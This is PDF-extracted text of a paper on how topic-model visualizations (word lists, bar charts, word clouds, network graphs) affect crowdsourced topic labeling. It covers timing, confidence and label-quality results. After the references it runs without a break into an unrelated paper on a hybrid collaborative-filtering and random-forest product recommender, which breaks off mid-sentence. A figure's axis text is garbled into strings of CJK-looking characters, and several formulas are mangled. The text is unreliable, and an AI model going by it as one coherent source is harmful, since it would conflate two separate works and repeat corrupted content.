does not pick the bad label as the “worst”, we discard all data in that HIT. 3.5 Study Design and Data Collection For Phase I, we use a factorial design with factors of Visualization (levels: word list, word list with bars, word cloud, and network graph) and Cardinal- ity (levels: 5, 10, and 20), yielding twelve condi- tions. For each of the fifty topics in the model and each of the twelve conditions, at least five users per- form the labeling task, describing the topic with a label and sentence, resulting in a minimum of 3,000 label and sentence pairs. Each HIT includes five of these labeling tasks, for a minimum of 600 HITs. The users are paid $0.30 per HIT. For Phase II, we compare descriptions across the four visualization techniques (and automatically generated labels), but only within a given cardinality level rather than across cardinalities. We collected 3,212 label and sentence pairs from 589 users during Phase I. For validation in Phase II, we use the first five labels and sentences collected for each condi- tion for a total of 3.000 labels and sentences. These are shown in sets of four (labels or sentences) dur- ing Phase II, yielding a total of 1,500 (3,000/4 + 3,000/4) tasks. Each HIT contains four validation tasks and one ground truth seeding task, for a to- tal of 375 HITs. To increase robustness, we validate twice for a total of 750 HITs, without allowing any two labels or sentences to be compared twice. The users get $0.50 per HIT. 4 Results We analyze labeling time and self-reported confi- dence for the labeling task (Phase I) before report- ing on the label quality assessments (Phase II). We then analyze linguistic qualities of the labels, which should motivate future work in automatic label gen- eration. (a) TOPIC 25 (coh. = 0.21)(b) TOPIC 26 (0.21) (c) TOPIC 3 (0.20) (d) TOPIC 9 (0.01) (e) TOPIC 16 (0.01) (f) TOPIC 23 (0.02) To pi cs w / H ig h C oh er en ce To pi cs w / L ow C oh er en ce Figure 4: Word list with bar visualizations of the three best (top) and worst (bottom) topics according to their coherence score, which is shown to the right of the topic number. The average topic coherence is 0.09 (SD=0.05). We first provide an example of user-generated la- bels and sentences: the user labels for the topic shown in Figure 1 include government, iraq war, politics, bush administration, and war on terror. Ex- amples of sentences include “President Bush’s mili- tary plan in Iraq” and “World news involving the US president and Iraq”.7 To interpret the results, it is useful to also un- derstand the quality of the generated topics, which varies throughout the model and may impact a user’s ability to generate good labels. We measure topic quality using topic coherence, an automatic measure that correlates with how much sense a topic makes to a user (Lau et al., 2014).8 The average topic coher- ence for the model is 0.09 (SD = 0.05). Figure 4 shows the three best (top) and three worst topics (bottom) according to their observed coherence: the coherence metric distinguishes obvious topics from inscrutable ones. Section 4.3 shows that users cre- 7The complete set of labels and sentences are available at https://github.com/alisonmsmith/Papers/ tree/master/TopicRepresentations. 8We use a reference corpus of 23 million Wikipedia arti- cles for computing normalized pointwise mutual information needed for computing the observed coherence. 7 https://github.com/alisonmsmith/Papers/tree/master/TopicRepresentations https://github.com/alisonmsmith/Papers/tree/master/TopicRepresentations Technique Word List Word List w/ Bars Word Cloud Network Graph Cardinality 5 10 20 5 10 20 5 10 20 5 10 20 # tasks completed 264 268 268 264 280 260 268 268 268 267 274 263 Avg time (SD) 53.0 (44.3) 53.2 (46.6) 52.1 (53.3) 58.4 (75.1) 58.7 (51.1) 60.7 (57.9) 52.7 (47.4) 49.4 (37.4) 68.4 (85.4) 55.0 (50.7) 55.6 (56.0) 77.9 (71.9) Avg confidence (SD) 3.7 (0.9) 3.7 (0.9) 3.6 (0.9) 3.6 (0.9) 3.6 (0.8) 3.7 (0.8) 3.5 (1.0) 3.6 (0.9) 3.6 (0.9) 3.4 (1.1) 3.6 (0.8) 3.7 (0.8) Table 1: Overview of the labeling phase: number of tasks completed, the average and standard deviation (in paren- theses) for time spent per task in seconds, and the average and standard deviation for self-reported confidence on a 5-point Likert scale for each of the twelve conditions. 吀椀洀攀 ⠀猀攀挀⸀⤀ 眀漀爀搀猀㔀㄀㈀㔀㄀㈀㔀㄀㈀㔀㄀㈀圀漀爀搀䰀椀猀琀圀漀爀搀䰀椀猀琀眀⼀䈀愀爀猀圀漀爀搀䌀氀漀甀搀一攀琀眀漀爀欀䜀爀愀瀀栀㔀㐀㘀㜀㠀 Figure 5: Average time for the labeling task, across vi- sualizations and cardinalities, ordered from left to right by visual complexity. For 20 words, network graph was significantly slower and word list was significantly faster than the other visualization techniques. Error bars show standard error. ated lower quality labels for low coherence topics. 4.1 Labeling Time More complex visualization techniques take longer to label (Table 1 and Figure 5). The labeling tasks took on average 57.9 seconds (SD = 58.5) to com- plete and a two-way ANOVA (visualization technique × cardinality) reveals significant main effects for both the visualization technique9 and the cardinal- ity,10 as well as a significant interaction effect.11 For lower cardinality, the labeling time across vi- sualization techniques is similar, but there are no- table differences for higher cardinality. Posthoc pairwise comparisons based on the interaction ef- fect (with Bonferroni adjustment) found no signif- icant differences between visualizations with five words and only one significant difference for ten words (word list with bars was slower than word cloud, p < .05). For twenty words, however, the net- work graph was significantly slower at an average of 77.9s (SD = 72.0) than the other three visualiza- 9F(3,3199) = 10.58, p < .001, η 2 p = .01 10F(2,3199) = 14.60, p < .001, η 2 p = .01 11F(6,3199) = 4.59, p < .001, η 2 p = .01 tions ( p < .05). This effect is likely due to the net- work graph becoming increasingly dense with more nodes (Figure 1, bottom right). In contrast, the rel- atively simple word list visualization was signifi- cantly faster with twenty words than the three other visualizations (p < .05), taking only 52.1s on aver- age (SD = 53.4). Word list with bars and word cloud were not significantly different from each other. As a secondary analysis, we examine the rela- tionship between elapsed time and the observed co- herence for each topic. Topics with high coher- ence scores, for example, may be faster to label, because they are easier to interpret. However, the small negative correlation between time and coher- ence (Figure 6, top) was not significant (r48 =−.13, p = .364). 4.2 Self-Reported Labeling Confidence For each labeling task, users rate their confidence that their labels and sentences describe the topic well on a scale from 1 (least confident) to 5 (most confi- dent). The average confidence across all conditions was 3.6 (SD = 0.9). Kruskal-Wallis tests show a sig- nificant impact of visualization technique on con- fidence with five and ten words, but not twenty.12 While average confidence ratings across all condi- tions only range from 3.4 to 3.7, perceived confi- dence with network graph suffers when the visual- ization has too few words (Table 1). As a secondary analysis, we compare the self- reported confidence with observed coherence for each topic (Figure 6, bottom). Increased user con- fidence with more coherent topics is supported by a moderate positive correlation between topic coher- 12Five words: χ 23 = 12.62, p = .006. Ten words: χ 2 3 = 7.94, p = .047. We used nonparametric tests because the data is ordi- nal and we cannot guarantee that all differences between points on the scale are equal. 8 Figure 6: Relationship between observed coherence and labeling time (top) and observed coherence and self- reported confidence (bottom) for each topic. The positive correlation (Slope = 1.64 and R2 = 0.10) for confidence is significant. ence and confidence (r48 = .32, p = .026). This re- sult provides further evidence that topic coherence is an effective measurement of topic interpretability. 4.3 Other Users’ Rating of Label Quality Other users’ perceived quality of topic labels is the best real-world measure of quality (as described in Section 3.4). Overall, the visualization techniques had similar quality labels, but automatically gener- ated labels do not fare well. Automatic labels get far fewer “best” votes and far more “worst” votes than user-generated labels produced from any of the four visualization techniques (Figure 7). Chi-square tests on the distribution of “best” votes for labels for each cardinality show that the visualization mat- ters.13 Posthoc analysis using pairwise Chi-square 13Five words: χ 24,N=500 = 16.47, p = .002. Ten words: χ 24,N=500 = 14.62, p = .006. Twenty words: χ 2 4,N=500 = 22.83, p < .001. tests with Bonferroni correction show that automatic labels were significantly worse than user-generated labels from each of the visualization techniques (all comparisons p < .05). No other pairwise compar- isons were significant. For sentences, no visualization technique emerged as better than the others. Additionally, there is no existing automatic approach to compare against. The distribution of “best” counts here was relatively uniform. Separate Kruskal-Wallis tests for each cardinality to examine the impact of the visualization techniques on “best” counts did not reveal any significant results. As a secondary qualitative analysis, we examine the relationship between topic coherence and the as- sessed quality of the labels. The automatic algorithm tended to produce better labels for the coherent top- ics than for the incoherent topics. For example, Topic 26 (Figure 4, b)—{music, band, songs}—and Topic 31 (Figure 4, c)—{food, restaurant, wine}— are two of the most coherent topics. The automatic algorithm labeled Topic 26 as music and Topic 31 as food. For both of these coherent topics, the labels generated by the automatic algorithm secured the most “best” votes and no “worst” votes. In contrast, Topic 16 (Figure 4, e)—{years, home, work}—and Topic 23 (Figure 4, f)—{death, family, board}— are two of the least coherent topics. The automatic labels refusal of work and death of michael jackson yielded the most “worst” votes and fewest “best” votes. To further demonstrate this relationship, we ex- tracted from the 50 topics the top and bottom quar- tiles of 13 topics each14 based on their observed co- herence scores. Figure 8 shows a comparison of the “best” and “worst” votes for the topic labels for these quartiles, including user-generated and auto- matically generated labels. For the top quartile, the number of “best” votes per technique ranged from 61 for automatic labels to 96 for the network graph visualization. The range for the bottom quartile was larger, from only 45 “best” votes for automatic la- bels to 99 for word list with bars. The automatic la- bels, in particular, received a large relative increase in “best” votes when comparing the bottom quartile 14We could not get exact quartiles, because we have 50 top- ics, so we rounded up to include 13 topics in each quartile. 9 # of “B es t” / “W or st ” v ot es 5 words 5 words 10 words 10 words 20 words 20 words (a) Labels per condition (b) Sentences per condition “Best” votes “Worst” votes Figure 7: The “best” and “worst” votes for labels and sentences for each condition. The automatically generated labels received more “worst” votes and fewer “best” votes compared to the user-created labels. to the top quartile (increase of 37%). Additionally, the word list, word cloud, and net- work graph visualizations all lead to labels with sim- ilar “best” and “worst” votes for both the top and bottom quartiles. However, the word list with bars representation shows both a large relative increase for the best votes (increase of 19%) and relative de- crease for the “worst” votes (decrease of 23%) when comparing the top to the bottom quartile. These re- sults suggest that adding numeric word probability information highlighted by the bars may help users understand poor quality topics. 4.4 Label Analysis The results of Phase I provide a large manually gen- erated label set. Exploratory analysis of these labels reveals linguistic features users tend to incorporate when labeling topics. We discuss implications for automatic labeling in Section 5. In particular, users prefer shorter labels, labels that include topic words and phrases, and abstraction in topic labeling. Length The manually generated labels use 2.01 words (SD = 0.95), and the algorithmically gener- ated labels use 3.16 words (SD = 2.05). Interest- ingly, the labels voted as “best” were shorter on aver- age than those voted “worst”, regardless of whether algorithmically generated labels are included in the analysis. With algorithmically generated labels in- Network Graph AlgorithmWord CloudWord List w/ BarsWord List Network Graph AlgorithmWord CloudWord List w/ BarsWord List (a) Top quartile of topics (b) Bottom quartile of topics # of “ B es t” / “W or st ” Vo te s fo r La be ls Figure 8: Comparison of the “best” and “worst” votes for labels generated using the different visualization tech- niques (and the automatically generated labels) for the top quartile of topics (top) and bottom quartile of topics (bottom) by topic coherence. The automatically gener- ated labels receive far more “best” votes for the coherent topics. cluded, the average lengths are 2.04 (SD = 1.16) words for “best” labels and 2.83 (SD = 1.79) words for “worst” labels,15 but even without the algo- rithmically generated labels, the “best” labels are 15The “best” label set includes all labels voted at least once as “best”, and similarly the “worst” label set includes all labels voted at least once as “worst”. 10 Figure 9: Relationship between rank of topic words and the average probability of occurrences in labels. The three lines—red, green, and blue—represent cardinality of five, ten, and twenty, respectively. The higher-ranked words were used more frequently. shorter (M = 1.96, SD = .87) than the “worst” la- bels (M = 2.09, SD = 1.01). Shared Topic Words Of the 3,212 labels, 2,278, or 71%, contain at least one word taken directly from the topic words—that is, the five, ten, or twenty words shown in the visualization; however, there are no notable differences between the visualization techniques. Additionally, the number of topic words included on average was similar across all three car- dinalities, suggesting that users often use the same number of topic words regardless of how many were shown in the visualization. We further examine the relationship between a topic word’s rank and whether the word was selected for inclusion in the labels. Figure 9 shows the aver- age probability of a topic word being used in a label by the topic word’s rank. More highly ranked words were included more frequently in labels. As cardi- nality increased, the highest ranked words were also less likely to be employed, as users had more words available to them. Phrases Although LDA makes a “bag of words” assumption when generating topics, users can recon- struct relevant phrases from the unique words. For Topic 26, for example, all visualizations include the same topic terms. However, the network graph vi- sualization highlights the phrases “jazz singer” and “rock band” by linking their words as commonly co- occurring terms in the corpus. These phrases are not as easily discernible in the word cloud visual- ization (Figure 10). We compute a set of common Figure 10: Word cloud and network graph visualizations of Topic 26. Phrases such as “jazz singer” and “rock band” are obscured in the word cloud but are shown in the network graph as connected nodes. phrases by taking all bigrams and trigrams that oc- cur more than fifty and twenty times, respectively, in the NYT corpus. Of the 3212 labels, 575 contain one of these common phrases, but those generated by users with the network graph visualization contain the most phrases. Labels generated in the word list (22% of the labels), word list with bars (25%), and word cloud (24%) conditions contain fewer phrases than the labels generated in the network graph condi- tion (29%). Although it is not surprising that the net- work graph visualization better communicates com- mon phrases in the corpus as edges are drawn be- tween these phrases, this suggests other approaches to drawing edges. Edges drawn based on sentence or document-based co-occurrence, for example, could instead uncover longer-distance dependencies be- tween words, potentially identifying distinct sub- topics with a topic. Hyponymy Users often prefer more general terms for labels than the words in the topic (Newman et al., 2010b). To measure this, we look for the set of unique hyponyms and hypernyms of the topic words, or those that are not themselves a topic word, that appear in the manually generated labels. We use the super-subordinate relation, which represents hypernymy and hyponymy, from WordNet (Miller, 1995). Of the 3,212 labels, 235 include a unique hypernym and 152 include a unique hyponym of the associated topic words found using WordNet, confirming that users are significantly more likely to produce a more generic description of the topic (χ 21,N=387 = 17.38, p < .001). For the 235 more generic labels, fewer of these came from word list (22%) and more from the network graph (30%) than the other visualization techniques—word list with bars (24%) and word cloud (24%). This may mean 11 that the network graph helps users to better under- stand the topic words as a group and therefore la- bel them using a hypernym. We also compared hy- pernym inclusion for “best” and “worst” labels: 63 (5%) of the “best” labels included a hypernym while only 44 (3%) of the “worst” labels included a hy- pernym. Each of the visualization techniques led to approximately the same percentage of the 152 total more specific labels. 5 Discussion Although the four visualization techniques yield similar quality labels, our crowdsourced study high- lights the strengths and weaknesses of the tech- niques. It also reveals some preferred linguistic fea- tures of user-generated labels and how these differ from automatically generated labels. The trade-offs among the visualization tech- niques show that context matters. If efficiency is paramount, then word lists—both simple and fast— are likely best. For a cardinality of twenty words, for example, users presented with the simple word list are significantly faster at labeling than those shown the network graph visualization. At the same time, more complex visualizations expose users to multi-word expressions that the simpler visualiza- tion techniques may obscure (Section 4.4). Future work should investigate for what types of user tasks this information is most useful. There is also po- tential for misinterpretation of topic meaning when cardinality is low. Users can misunderstand the topic based on the small set of words, or adjacent words can inadvertently appear to form a meaning- ful phrase, which may be particularly an issue for the word cloud. Our crowdsourced study identified the “best” and “worst” labels for the topic’s documents. An addi- tional qualitative coding phase could evaluate each “worst” label to determine why, whether due to misinterpretation, spelling or grammatical errors, length, or something else. Surprisingly, we found no relationship between topic coherence and labeling time (Section 4.1). This is perhaps because not only are users quick to label topics they understand, but they also quickly give up when they have no idea what a topic is about. We do, however, find a relationship between coher- ence and confidence (Section 4.2). This positive correlation supports topic coherence as an effective measure for human interpretability. Automatically generated labels are consistently chosen as the “worst” labels, although they are com- petitive with the user-generated labels for highly coherent topics (Section 4.3). Future automatic labeling algorithms should still be robust to poor topics. Algorithmically generated labels were longer and more specific than the user-generated la- bels. It is unsurprising that these automatic labels were consistently deemed the worst. Users pre- fer shorter labels with more general words (e.g., hypernyms, Section 4.4). We show specific ex- amples of this phenomenon from Topic 14 and Topic 48. For Topic 14—{health, drug, med- ical, research, conditions}—the algorithm gener- ated the label health care in the united states, but users preferred the less specific labels health and medical research. Similarly, for Topic 48—{league, team, baseball, players, contract}—the algorithm generated the label major league baseball on fox; users preferred simpler labels, such as baseball. Au- tomatic labeling algorithms thus can be improved to focus on general, shorter labels. Interestingly, sim- ple textual labels have been shown to be more ef- ficient but less effective than topic keywords (i.e., word lists) for an automatic document retrieval task (Aletras and Stevenson, 2014), highlighting the extra information present in the word lists. Our find- ings show that users are also able to effectively in- terpret the word list information, as that visualiza- tion was both efficient and effective for the task of topic labeling compared to the other more complex visualizations. Although we use WordNet to verify that users pre- fer more general labels, this is not a panacea, be- cause WordNet does not capture all of the general- ization users want in labels. In many cases, users use terms that synthesize relationships beyond triv- ial WordNet relationships, such as locations or en- tities. For example, Topic 18—{san, los, angeles, terms, francisco}—was consistently labeled as the location California, and Topic 38—{open, second, final, won, williams}—which almost all users la- beled as tennis, required a knowledge of the enti- ties Serena Williams and the U.S. Open. In addition to WordNet, an automatic labeling algorithm could 12 use a gazetteer for determining locations from topic words and a knowledge base such as TAP (Guha and McCool, 2003), which provides a broad range of in- formation about popular culture for matching topic words to entities. 6 Conclusion and Future Work We present a crowdsourced user study to com- pare four topic visualization techniques—a simple ranked word list, a ranked word list with bars rep- resenting word probability, a word cloud, and a net- work graph—based on how they impact the user’s understanding of a topic. The four visualization techniques lead to similar quality labels as rated by end users. However, users label more quickly with the simple word list, yet tend to incorporate phrases and more generic terminology when using the more complex network graph. Additionally, users feel more confident labeling coherent topics, and manual labels far outperform the automatically generated la- bels against which they were evaluated. Automatic labeling can benefit from this research in two ways: by suggesting when to apply automatic labeling and by providing training data for improv- ing automatic labeling. While automatic labels falter compared to human labels in general, they do quite well when the underlying topics are of high qual- ity. Thus, one reasonable strategy would be to use automatic labels for a portion of topics, but to use human validation to either first improve the remain- der of the topics (Hu et al., 2014) or to provide labels (as in this study) for lower quality topics. Moreover, our labels provide training data that may be use- ful for automatic labeling techniques using feature- based models (Charniak, 2000)—combining infor- mation from Wikipedia, WordNet, syntax, and the underlying topics—to reproduce the types of labels and sentences created (and favored) by users. Finally, our study focuses on comparing individ- ual topic visualization techniques. An open ques- tion that we do not address is whether this gen- eralizes to understanding entire topic models. In other words, simple word list visualizations are use- ful for quick and high-quality topic summarization, but does this mean that a collection of word lists— one per topic—will also be optimal when displaying the entire model? Future work should look at com- paring visualization techniques for full topic model understanding. Acknowledgments We would like to thank the anonymous reviewers as well as the TACL editors, Timothy Baldwin and Lil- lian Lee, for helpful comments on an earlier draft of this paper. This work was funded by NSF grant IIS- 1409287. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of the National Science Foundation. References Nikolaos Aletras and Mark Stevenson. 2014. Labelling topics using unsupervised graph-based methods. In Proceedings of the Association for Computational Lin- guistics. Nikolaos Aletras, Timothy Baldwin, Jey Han Lau, and Mark Stevenson. 2014. Representing topics labels for exploring digital libraries. In Proceedings of the IEEE/ACM Joint Conference on Digital Libraries. Lukas Barth, Stephen G. Kobourov, and Sergey Pupyrev. 2014. Experimental comparison of semantic word clouds. In Experimental Algorithms. Springer. David M. Blei, Andrew Y. Ng, and Michael I. Jordan. 2003. Latent Dirichlet allocation. Journal of Machine Learning Research, 3:993–1022. David M. Blei. 2012. Probabilistic topic models. Com- munications of the ACM, 55(4):77–84. Jordan Boyd-Graber, David Mimno, and David Newman, 2014. Care and Feeding of Topic Models: Problems, Diagnostics, and Improvements. CRC Handbooks of Modern Statistical Methods. CRC Press, Boca Raton, Florida. Allison June Barlow Chaney and David M. Blei. 2012. Visualizing topic models. In International Conference on Weblogs and Social Media. Jonathan Chang, Jordan Boyd-Graber, Chong Wang, Sean Gerrish, and David M. Blei. 2009. Reading tea leaves: How humans interpret topic models. In Pro- ceedings of Advances in Neural Information Process- ing Systems. Eugene Charniak. 2000. A maximum-entropy-inspired parser. In Conference of the North American Chapter of the Association for Computational Linguistics. Jason Chuang, Christopher D. Manning, and Jeffrey Heer. 2012. Termite: Visualization techniques for as- sessing textual topic models. In Proceedings of the ACM Conference on Advanced Visual Interfaces. 13 Jacob Eisenstein, Duen Horng Chau, Aniket Kittur, and Eric Xing. 2012. TopicViz: Interactive topic explo- ration in document collections. In International Con- ference on Human Factors in Computing Systems. Thomas M.J. Fruchterman and Edward M. Reingold. 1991. Graph drawing by force-directed placement. Software: Practice and experience, 21(11):1129– 1164. Matthew J. Gardner, Joshua Lutes, Jeff Lund, Josh Hansen, Dan Walker, Eric Ringger, and Kevin Seppi. 2010. The Topic Browser: An interactive tool for browsing topic models. In Proceedings of the NIPS Workshop on Challenges of Data Visualization. Ramanathan Guha and Rob McCool. 2003. TAP: A semantic web platform. Computer Networks, 42(5):557–577. Matthew Hoffman, David M. Blei, Chong Wang, and John Paisley. 2013. Stochastic variational inference. Journal of Machine Learning Research, 14:1303– 1347. Andreas Hotho, Andreas Nürnberger, and Gerhard Paass. 2005. A brief survey of text mining. Journal for Computational Linguistics and Language Technology, 20(1):19–62. Yuening Hu, Jordan Boyd-Graber, Brianna Satinoff, and Alison Smith. 2014. Interactive topic modeling. Ma- chine Learning, 95(3):423–469. Fred Jelinek, Robert L. Mercer, Lalit R. Bahl, and James K. Baker. 1977. Perplexity–a measure of the difficulty of speech recognition tasks. The Journal of the Acoustical Society of America, 62(S1):S63–S63. Lauren F. Klein, Jacob Eisenstein, and Iris Sun. 2015. Exploratory thematic analysis for digitized archival collections. Digital Scholarship in the Humanities. Jon Kleinberg. 2003. An impossibility theorem for clus- tering. In Proceedings of Advances in Neural Infor- mation Processing Systems. Jey Han Lau, David Newman, Sarvnaz Karimi, and Tim- othy Baldwin. 2010. Best topic word selection for topic labelling. In Proceedings of the Association for Computational Linguistics. Jey Han Lau, Karl Grieser, David Newman, and Timothy Baldwin. 2011. Automatic labelling of topic models. In Proceedings of the Association for Computational Linguistics. Jey Han Lau, David Newman, and Timothy Baldwin. 2014. Machine reading tea leaves: Automatically evaluating topic coherence and topic model quality. In Proceedings of the European Chapter of the Associa- tion for Computational Linguistics. Qiaozhu Mei, Xuehua Shen, and ChengXiang Zhai. 2007. Automatic labeling of multinomial topic mod- els. In Knowledge Discovery and Data Mining. George A. Miller. 1995. WordNet: A lexical database for English. Communications of the ACM, 38(11):39–41. Andrew Mueller. 2012. Word cloud. https:// github.com/amueller/word_cloud. David Newman, Jey Han Lau, Karl Grieser, and Timothy Baldwin. 2010a. Automatic evaluation of topic coher- ence. In Conference of the North American Chapter of the Association for Computational Linguistics. David Newman, Youn Noh, Edmund Talley, Sarvnaz Karimi, and Timothy Baldwin. 2010b. Evaluating topic models for digital libraries. In Proceedings of the IEEE/ACM Joint Conference on Digital Libraries. Viet-An Nguyen, Yuening Hu, Jordan Boyd-Graber, and Philip Resnik. 2013. Argviz: Interactive visualiza- tion of topic dynamics in multi-party conversations. In Conference of the North American Chapter of the As- sociation for Computational Linguistics. Daniel Ramage, Susan T. Dumais, and Daniel J. Liebling. 2010. Characterizing microblogs with topic models. In International Conference on Weblogs and Social Media. Patrick Riehmann, Manfred Hanfler, and Bernd Froehlich. 2005. Interactive Sankey diagrams. In IEEE Symposium on Information Visualization. Eduarda Mendes Rodrigues, Natasa Milic-Frayling, Marc Smith, Ben Shneiderman, and Derek Hansen. 2011. Group-in-a-box layout for multi-faceted anal- ysis of communities. In Proceedings of the IEEE Con- ference on Social Computing. Evan Sandhaus. 2008. The New York Times annotated corpus LDC2008T19. Linguistic Data Consortium, Philadelphia. Ben Shneiderman. 1992. Tree visualization with treemaps: A 2-D space-filling approach. ACM Trans- actions on Graphics, 11(1):92–99. Carson Sievert and Kenneth E. Shirley. 2014. LDAvis: A method for visualizing and interpreting topics. In Proceedings of the Workshop on Interactive Language Learning, Visualization, and Interfaces. Alison Smith, Jason Chuang, Yuening Hu, Jordan Boyd- Graber, and Leah Findlater. 2014. Concurrent visu- alization of relationships between words and topics in topic models. In Proceedings of the Workshop on In- teractive Language Learning, Visualization, and Inter- faces. Alison Smith, Sana Malik, and Ben Shneiderman. 2015. Visual analysis of topical evolution in unstructured text: Design and evaluation of TopicFlow. In Appli- cations of Social Media and Social Network Analysis. Alexander Smola and Shravan Narayanamurthy. 2010. An architecture for parallel topic models. In Proceed- ings of the VLDB Endowment. 14 https://github.com/amueller/word_cloud https://github.com/amueller/word_cloud Hanna Wallach, David Mimno, and Andrew McCallum. 2009a. Rethinking LDA: Why priors matter. In Pro- ceedings of Advances in Neural Information Process- ing Systems. Hanna M. Wallach, Iain Murray, Ruslan Salakhutdinov, and David Mimno. 2009b. Evaluation methods for topic models. In Proceedings of the 26th Annual In- ternational Conference on Machine Learning. Limin Yao, David Mimno, and Andrew McCallum. 2009. Efficient methods for topic model inference on streaming document collections. In Knowledge Dis- covery and Data Mining. Ji Soo Yi, Rachel Melton, John Stasko, and Julie A. Jacko. 2005. Dust & magnet: Multivariate informa- tion visualization using a magnet metaphor. Informa- tion Visualization, 4(4):239–256. Ke Zhai, Jordan Boyd-Graber, Nima Asadi, and Mo- hamad Alkhouja. 2012. Mr. LDA: A flexible large scale topic modeling package using variational infer- ence in MapReduce. In Proceedings of the ACM Con- ference on World Wide Web. 15 16 work_nq37vdnimjagpmgma7pomew6b4 ---- (Shengquan Yang) Research of Virtual Classroom’s Collaborative Mechanism Based on Petri Net International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 DOI: 10.21307/ijanmc-2020-021 1 Research on Commodity Mixed Recommendation Algorithm Chang Hao School of Computer Science and Engineering Xi'an Technological University Xi'an, China E-mail: 271203550@qq.com Yang Shengquan School of Computer Science and Engineering Xi'an Technological University Xi'an, China E-mail: 1355593006@qq.com Abstract—With the advent of the era of big data, our lives generate huge amounts of data every day, and the field of e- commerce is no exception. It is particularly important to analyze these data and recommend products. It is reported that through the recommendation algorithm, Amazon has increased its sales by about 30%. Among the recommended algorithms, the collaborative filtering algorithm is currently relatively mature and has achieved very good results in various fields. But the traditional collaborative filtering algorithm is too rough when calculating the similarity and prediction score, and the efficiency is very low. We combine the traditional collaborative filtering algorithm with the decision tree algorithm, and improve the traditional recommendation algorithm, create a collaborative filtering decision tree algorithm to recommend products, and run the new collaborative filtering decision tree algorithm on the Hadoop platform on. Experiments show that the improved algorithm makes the accuracy of recommendation significantly improved. Keywords-E-Commerce; Recommendation Algorithm; Decision Tree; Collaborative Filtering I. INTRODUCTION With the development of science and technology, Internet technology has also rapidly developed and popularized, so that the data on the network is growing at the level of PB every day, bringing a lot of information resources to users and greatly enriching people's daily lives. However, the problem of rapid expansion of a large number of information resources has also emerged. "Information overload" is also a problem that Internet users are facing. "Information overload" refers to the difficulty for Internet users to accurately and quickly locate the information they need from massive data [1]. The generation of recommendation system has greatly eased the problem of "information overload". The recommendation system is automatic and intelligent to recommend items for users, and it will dynamically adjust the recommended item types according to the changes of user behavior, which truly avoids the "information overload" problem. Faced with such a huge amount of data, it is necessary to adopt a big data model for analysis. Compared with the traditional data model using random analysis (sampling survey), the big data model analyzes all data and has the characteristics of 4V, Namely Large Volume, High Speed, Variety, Value. Collaborative filtering algorithm is one of the most concise and practical recommendation algorithms. If you use traditional data model for sampling survey, it will inevitably aggravate the sparsity problem of the algorithm itself, so it is of great significance to design a big data model based on collaborative filtering. And necessary. If you want to process big data, a single computer cannot be realized, so the application of distributed architecture is particularly important. So the algorithm model is run under the Hadoop distributed framework. MapReduce is a distributed computing framework under Hadoop [2]. It uses the "divide and conquer" idea to decompose complex tasks or data into several simple tasks for parallel processing. Afterwards, it performs global summarization, which greatly improves the efficiency of the algorithm. This article mainly studies the distributed recommendation algorithm under the Hadoop platform. The recommendation algorithm combines the decision tree and the collaborative filtering algorithm, and improves the traditional collaborative filtering algorithm to improve the timeliness of recommendation. II. INTRODUCTION TO RELATED TECHNOLOGIES A. Introduction to the traditional collaborative filtering algorithm Collaborative filtering algorithm is the most successful information filtering algorithm used in the International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 2 current recommendation system. The main method is to extract the historical behaviors generated by users to make recommendations. The traditional collaborative filtering algorithm is mainly divided into item-based collaborative filtering algorithm (ItemCF) and user- based collaborative filtering algorithm (UserCF) [3]. The core process of collaborative filtering algorithm is as follows: Collect user preferences, find similar users or items, and calculate recommendations, the core of which is the calculation of similarity Euclidean distance similarity method (Formula 1), Pearson correlation coefficient similarity method (Formula 2), Salton similarity method (Formula 3) and Cosine similarity method (Formula 4) are several common similarities Calculation method [4]. O(x, y) = √(∑(𝑥𝑖 − 𝑦𝑖 ) 2) (1)  P(x, y) = n ∑ xi−∑ xi ∑ yi √n ∑ xi 2−(∑ xi) 2√n ∑ yi 2−(∑ yi) 2 (2) S(x, y) = ∣N(u)∩N(v)∣ √∣N(u)∣⋅√∣N(v)∣ (3) COS(x, y) = ∑ xiyi √∑ xi 2√∑ yi 2 (4) B. Introduction to Decision Tree It is a typical classification algorithm. It first processes data, uses inductive algorithms to generate readable rules and decision trees, and then uses decisions to analyze new data. After getting the recommended products in the previous step, extract the features [5]. A data set will extract many features, but which feature is selected as the root node? Which feature is selected as the optimal solution? At this time, we need to introduce a new measure-entropy. Entropy refers to the uncertainty of random variables. The algorithm for calculating their entropy values is shown in Formula 5: H(x) = − ∑ pi ∗ log pi , i = 1,2, … , n (5) Where pi represents the probability of each feature, it can be seen from the formula that when the probability is greater and the purity is greater, the entropy value will be smaller, and the smaller the entropy value, the more stable the feature. There are three selection criteria for features: information gain (ID3), information gain rate (C4.5) and Gini index (CART). The development of decision trees is getting faster and faster, and many excellent algorithms have been derived, such as GDBT (Gradient Boosting Decision Tree), RF (Random Forest random forest), etc, the decision trees have considerable advantages in terms of accuracy improvement, they are used frequently in various games, and the effect is very good. At some times, the neural network that has been painstakingly built is not as accurate as the relatively simple random structure. The forest is high, so this article will use random forest to optimize the algorithm. III. RECOMMENDED ALGORITHM DESIGN The collaborative filtering algorithm is the most widely used algorithm in the recommendation system. Because of its versatility of the model, it does not require too much expertise in the corresponding data field. The engineering implementation is relatively simple, and the effect is also good. It is widely praised by all walks of life. But collaborative filtering has its own problems, such as "cold start" and "sparseness" has always been a problem of collaborative filtering itself. Therefore, in the context of today's big data era, collaborative filtering may not be suitable for direct recommendation algorithms. To solve this problem, this paper designs a hybrid recommendation algorithm. A. Random Forest random forest Because a single decision tree has obvious drawbacks in the recommendation system, a random forest composed of multiple decision trees can effectively solve the problems of a single decision tree. In essence, the decision tree is a special tree because it contains many judgment nodes, and the model of the random forest is composed of multiple decision trees[6]. The main idea of the random forest algorithm is to use some single classifiers to form a large classifier, which mainly includes the following three steps: Step 1: Randomly sample multiple decision trees that need to be generated. As many decision trees as needed, as many training subsets as there should be. This process involves a statistical sampling method, which is to extract several training subsets from the original training set. The sampling method to be used in this thesis is a sampling method based on Bagging thought. When the training set is extracted, it can be sampled repeatedly to ensure that the chance of the sample being selected is random and the probability is equal. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 3 Step 2: how to build the decision tree. The decision trees constructed from several training subsets selected in the first step are the main elements that constitute a random forest. The construction of these trees is not restricted by any factors, and does not do any pruning operations on the trees. When constructing a decision tree, not all attributes in the data set are selected as indicators for calculation, but are divided into several randomly selected "optimal" feature attributes, Then decompose according to the eigenvalue of k<K. In the decision tree, the C4.5 algorithm is used as the splitting 